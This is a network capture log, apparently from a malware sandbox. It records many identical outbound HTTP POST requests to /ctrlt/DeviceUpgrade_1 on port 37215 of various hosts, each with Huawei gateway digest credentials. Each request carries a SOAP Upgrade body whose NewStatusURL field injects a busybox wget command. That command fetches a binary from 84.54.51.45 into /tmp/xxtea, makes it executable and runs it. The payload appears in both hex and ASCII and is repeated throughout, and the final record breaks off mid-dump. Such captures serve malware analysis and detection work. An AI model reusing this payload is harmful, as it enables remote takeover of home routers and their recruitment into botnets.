                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            687192.168.2.154574841.122.171.12337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161210060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            688192.168.2.154864441.125.34.17837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161237001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            689192.168.2.154806441.22.47.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161237001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            690192.168.2.155362241.240.78.20937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161242008 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            691192.168.2.154794641.65.131.23237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161284924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            692192.168.2.155282441.83.248.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161289930 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            693192.168.2.154741041.107.144.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161320925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            694192.168.2.153761241.230.166.19737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161320925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            695192.168.2.154361441.158.175.25437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161360025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            696192.168.2.154153841.147.7.3437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.161360025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 